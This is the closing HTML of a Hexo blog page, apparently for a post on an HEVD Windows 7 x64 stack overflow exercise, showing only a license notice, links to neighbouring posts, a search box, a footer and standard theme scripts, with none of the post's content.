                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/06/29/HEVD%20win7%20x64%20arbitrary%20write/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">HEVD win7 x64 arbitrary write</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/06/10/fuzzing%20like%20a%20caveman2:%20improving%20performance/">
                        <span class="hidden-mobile">Fuzzing Like A Caveman2: Improving Performance 译</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "HEVD win7 x64 stack overflow&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>




















</body>
</html>
